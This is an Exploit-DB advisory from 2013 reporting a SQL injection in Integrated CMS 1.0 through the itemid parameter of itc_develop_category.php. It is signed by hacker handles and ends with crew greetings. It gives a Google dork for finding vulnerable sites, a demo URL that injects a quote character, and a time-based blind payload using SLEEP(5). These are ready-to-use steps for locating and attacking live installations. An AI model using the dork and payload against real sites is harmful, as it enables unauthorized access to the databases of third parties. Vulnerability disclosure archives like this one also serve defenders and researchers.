Integrated CMS 1.0 - SQL Injection

EDB-ID:

27525

CVE:



Author:

DSST

Type:

webapps


Platform:

PHP

Date:

2013-08-12


==========================================================================================================
[/]#~Exploit Title : Integrated CMS Saudi SQL Injection
[\]
[/]#~Exploit Author : DSST
[\]
[/]#~Vendor Home Page : in2sol.com
[\]
[/]#~Tested on: Windows 7,GNU/Linux,Windows XP,Windows 8
[\]
[/]#~Google Dork: inurl:itc_develop_category.php?itemid=
[\]
[/]#~Version : 1
[\]
==========================================================================================================
[/]@~Location : /itc_develop_category.php?itemid=[SQL]
[\]
[/]@~Demo 1:http://server/itc_develop_category.php?itemid=10%27
[\]
[\]
[\]@~Exploit-DB Note:
   Type: AND/OR time-based blind
   Title: MySQL > 5.0.11 AND time-based blind
   Payload: itemid=1 AND SLEEP(5)
==========================================================================================================
[/] D!sc0v3r3d by : Mr.Killer , Mr.EpSiLoN
[\]
[/] Greetz: |SILENT -SAJJAD13AND11-CRACK3R-HELL BOY-MR.BAD_JENS
[\]
[/] MEDRIK-HOTON -JJHACKER - GAME OVER !- IRIST-MR.HESAAM-Bl4ck C0d3R
[\]
[/] Explo!ter-Omid.Hacker-_Ali_-Beni_Vanda-D4?Kness 0w1-And All MemberR -|
[\]
==========================================================================================================